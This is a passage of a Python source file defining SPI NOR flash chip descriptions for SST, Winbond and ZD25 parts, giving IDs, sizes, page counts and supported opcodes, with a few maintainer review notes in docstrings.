        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST25WF080B(SpiNorFlashModule):
    """Sanyo-ID "sst25wf080b": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits.

    Fix: the SST25WF-B parts report the Sanyo JEDEC manufacturer ID, as the
    sibling entries in this table already do — sst25wf020a (0x1612) and
    sst25wf040b (0x1613) use SANYO, and this part is the next device ID in
    that sequence (0x1614). It was incorrectly listed under SST.
    """
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x1614
    name = "sst25wf080b"
    total_size = 1048576  # bytes (== page_size * total_pages)
    page_size = 256  # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST25WF512(SpiNorFlashModule):
    """SST "sst25wf512": 64 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst25wf512"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2501
    page_size = 256  # bytes
    total_pages = 256
    total_size = page_size * total_pages  # 65536 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class SST26VF016B(SpiNorFlashModule):
    """SST "sst26vf016b": 2 MiB SPI NOR flash with dual I/O, 256-byte pages."""
    name = "sst26vf016b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2641
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
    ]
    dummy_bits = 8
class SST26VF016BA(SpiNorFlashModule):
    """SST "sst26vf016ba": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst26vf016ba"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2641
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST26VF032B(SpiNorFlashModule):
    """SST "sst26vf032b": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst26vf032b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2642
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST26VF032BA(SpiNorFlashModule):
    """SST "sst26vf032ba": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst26vf032ba"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2642
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST26VF064B(SpiNorFlashModule):
    """SST "sst26vf064b": 8 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "sst26vf064b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2643
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class SST26VF064BA(SpiNorFlashModule):
    """SST "sst26vf064ba": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "sst26vf064ba"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2643
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class SST26WF016B(SpiNorFlashModule):
    """SST "sst26wf016b": 2 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "sst26wf016b"
    manufacturer_id = SpiNorFlashManufacturerIDs.SST
    device_id = 0x2651
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25M512JV(SpiNorFlashModule):
    """Winbond "w25m512jv": 64 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "w25m512jv"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7119
    page_size = 256  # bytes
    total_pages = 262144
    total_size = page_size * total_pages  # 67108864 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q128(SpiNorFlashModule):
    """Winbond "w25q128": 16 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "w25q128"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q128FV(SpiNorFlashModule):
    """Winbond "w25q128fv": 16 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "w25q128fv"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q128FW(SpiNorFlashModule):
    """Winbond "w25q128fw": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "w25q128fw"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q128JV(SpiNorFlashModule):
    """Winbond "w25q128jv": 16 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "w25q128jv"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7018
    page_size = 256  # bytes
    total_pages = 65536
    total_size = page_size * total_pages  # 16777216 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q16DW(SpiNorFlashModule):
    """Winbond W25Q16DW: 16 Mbit (2 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6015
    name = "w25q16dw"
    total_size = 2097152  # bytes (2 MiB)
    page_size = 256  # bytes
    total_pages = 8192  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q16JV(SpiNorFlashModule):
    """Winbond W25Q16JV: 16 Mbit (2 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4015
    name = "w25q16jv"
    total_size = 2097152  # bytes (2 MiB)
    page_size = 256  # bytes
    total_pages = 8192  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q16JV_IM(SpiNorFlashModule):
    """Winbond W25Q16JV-IM: 16 Mbit (2 MiB) SPI NOR flash (same ID as the -JM variant)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7015
    name = "w25q16jv-im"
    total_size = 2097152  # bytes (2 MiB)
    page_size = 256  # bytes
    total_pages = 8192  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q16JV_JM(SpiNorFlashModule):
    """Winbond W25Q16JV-JM: 16 Mbit (2 MiB) SPI NOR flash (same ID as the -IM variant)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7015
    name = "w25q16jv-jm"
    total_size = 2097152  # bytes (2 MiB)
    page_size = 256  # bytes
    total_pages = 8192  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q20BW(SpiNorFlashModule):
    """Winbond W25Q20BW: 2 Mbit (256 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x5012
    name = "w25q20bw"
    total_size = 262144  # bytes (256 KiB)
    page_size = 256  # bytes
    total_pages = 1024  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q20CL(SpiNorFlashModule):
    """Winbond W25Q20CL: 2 Mbit (256 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4012
    name = "w25q20cl"
    total_size = 262144  # bytes (256 KiB)
    page_size = 256  # bytes
    total_pages = 1024  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q20EW(SpiNorFlashModule):
    """Winbond W25Q20EW: 2 Mbit (256 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6012
    name = "w25q20ew"
    total_size = 262144  # bytes (256 KiB)
    page_size = 256  # bytes
    total_pages = 1024  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q256(SpiNorFlashModule):
    """Winbond W25Q256: 256 Mbit (32 MiB) SPI NOR flash.

    Larger than 16 MiB, so the 4-byte-address (_4B) opcode variants are
    listed alongside the 3-byte ones.
    """
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4019
    name = "w25q256"
    total_size = 33554432  # bytes (32 MiB)
    page_size = 256  # bytes
    total_pages = 131072  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class W25Q256FV(SpiNorFlashModule):
    """Winbond W25Q256FV: 256 Mbit (32 MiB) SPI NOR flash (same device ID as W25Q256)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4019
    name = "w25q256fv"
    total_size = 33554432  # bytes (32 MiB)
    page_size = 256  # bytes
    total_pages = 131072  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q256JV(SpiNorFlashModule):
    """Winbond W25Q256JV: 256 Mbit (32 MiB) SPI NOR flash (same device ID as W25Q256)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4019
    name = "w25q256jv"
    total_size = 33554432  # bytes (32 MiB)
    page_size = 256  # bytes
    total_pages = 131072  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q256JVM(SpiNorFlashModule):
    """Winbond W25Q256JVM: 256 Mbit (32 MiB) SPI NOR flash.

    NOTE(review): no _4B opcodes are listed even though the part is
    larger than 16 MiB — confirm whether 4-byte addressing is handled
    elsewhere for this entry.
    """
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7019
    name = "w25q256jvm"
    total_size = 33554432  # bytes (32 MiB)
    page_size = 256  # bytes
    total_pages = 131072  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q256JW(SpiNorFlashModule):
    """Winbond W25Q256JW: 256 Mbit (32 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6019
    name = "w25q256jw"
    total_size = 33554432  # bytes (32 MiB)
    page_size = 256  # bytes
    total_pages = 131072  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q32(SpiNorFlashModule):
    """Winbond W25Q32: 32 Mbit (4 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4016
    name = "w25q32"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q32DW(SpiNorFlashModule):
    """Winbond W25Q32DW: 32 Mbit (4 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6016
    name = "w25q32dw"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q32FV(SpiNorFlashModule):
    """Winbond W25Q32FV: 32 Mbit (4 MiB) SPI NOR flash (same device ID as W25Q32)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4016
    name = "w25q32fv"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q32JV(SpiNorFlashModule):
    """Winbond W25Q32JV: 32 Mbit (4 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x7016
    name = "w25q32jv"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q32JWM(SpiNorFlashModule):
    """Winbond W25Q32JWM: 32 Mbit (4 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x8016
    name = "w25q32jwm"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q64(SpiNorFlashModule):
    """Winbond W25Q64: 64 Mbit (8 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4017
    name = "w25q64"
    total_size = 8388608  # bytes (8 MiB)
    page_size = 256  # bytes
    total_pages = 32768  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q64DW(SpiNorFlashModule):
    """Winbond W25Q64DW: 64 Mbit (8 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x6017
    name = "w25q64dw"
    total_size = 8388608  # bytes (8 MiB)
    page_size = 256  # bytes
    total_pages = 32768  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q64FV(SpiNorFlashModule):
    """Winbond W25Q64FV: 64 Mbit (8 MiB) SPI NOR flash (same device ID as W25Q64)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4017
    name = "w25q64fv"
    total_size = 8388608  # bytes (8 MiB)
    page_size = 256  # bytes
    total_pages = 32768  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25Q64JV(SpiNorFlashModule):
    """Winbond W25Q64JV: 64 Mbit (8 MiB) SPI NOR flash.

    NOTE(review): unlike the sibling JV entries, READ_1_1_1_FAST is not
    listed here — confirm whether the omission is intentional.
    """
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4017
    name = "w25q64jv"
    total_size = 8388608  # bytes (8 MiB)
    page_size = 256  # bytes
    total_pages = 32768  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class W25Q80(SpiNorFlashModule):
    """Winbond W25Q80: 8 Mbit (1 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x5014
    name = "w25q80"
    total_size = 1048576  # bytes (1 MiB)
    page_size = 256  # bytes
    total_pages = 4096  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q80BL(SpiNorFlashModule):
    """Winbond W25Q80BL: 8 Mbit (1 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4014
    name = "w25q80bl"
    total_size = 1048576  # bytes (1 MiB)
    page_size = 256  # bytes
    total_pages = 4096  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25Q80BV(SpiNorFlashModule):
    """Winbond W25Q80BV: 8 Mbit (1 MiB) SPI NOR flash (same device ID as W25Q80BL)."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4014
    name = "w25q80bv"
    total_size = 1048576  # bytes (1 MiB)
    page_size = 256  # bytes
    total_pages = 4096  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class W25X05(SpiNorFlashModule):
    """Winbond W25X05: 512 Kbit (64 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3010
    name = "w25x05"
    total_size = 65536  # bytes (64 KiB)
    page_size = 256  # bytes
    total_pages = 256  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X10(SpiNorFlashModule):
    """Winbond W25X10: 1 Mbit (128 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3011
    name = "w25x10"
    total_size = 131072  # bytes (128 KiB)
    page_size = 256  # bytes
    total_pages = 512  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X16(SpiNorFlashModule):
    """Winbond W25X16: 16 Mbit (2 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3015
    name = "w25x16"
    total_size = 2097152  # bytes (2 MiB)
    page_size = 256  # bytes
    total_pages = 8192  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X20(SpiNorFlashModule):
    """Winbond W25X20: 2 Mbit (256 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3012
    name = "w25x20"
    total_size = 262144  # bytes (256 KiB)
    page_size = 256  # bytes
    total_pages = 1024  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X32(SpiNorFlashModule):
    """Winbond W25X32: 32 Mbit (4 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3016
    name = "w25x32"
    total_size = 4194304  # bytes (4 MiB)
    page_size = 256  # bytes
    total_pages = 16384  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X40(SpiNorFlashModule):
    """Winbond W25X40: 4 Mbit (512 KiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3013
    name = "w25x40"
    total_size = 524288  # bytes (512 KiB)
    page_size = 256  # bytes
    total_pages = 2048  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X64(SpiNorFlashModule):
    """Winbond W25X64: 64 Mbit (8 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3017
    name = "w25x64"
    total_size = 8388608  # bytes (8 MiB)
    page_size = 256  # bytes
    total_pages = 32768  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class W25X80(SpiNorFlashModule):
    """Winbond W25X80: 8 Mbit (1 MiB) SPI NOR flash."""
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x3014
    name = "w25x80"
    total_size = 1048576  # bytes (1 MiB)
    page_size = 256  # bytes
    total_pages = 4096  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class ZD25D20(SpiNorFlashModule):
    """ZD25D20: 2 Mbit (256 KiB) SPI NOR flash, listed under the THOMSON manufacturer ID."""
    manufacturer_id = SpiNorFlashManufacturerIDs.THOMSON
    device_id = 0x2012
    name = "zd25d20"
    total_size = 262144  # bytes (256 KiB)
    page_size = 256  # bytes
    total_pages = 1024  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class ZD25D40(SpiNorFlashModule):
    """ZD25D40: 4 Mbit (512 KiB) SPI NOR flash, listed under the THOMSON manufacturer ID."""
    manufacturer_id = SpiNorFlashManufacturerIDs.THOMSON
    device_id = 0x2013
    name = "zd25d40"
    total_size = 524288  # bytes (512 KiB)
    page_size = 256  # bytes
    total_pages = 2048  # = total_size / page_size
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
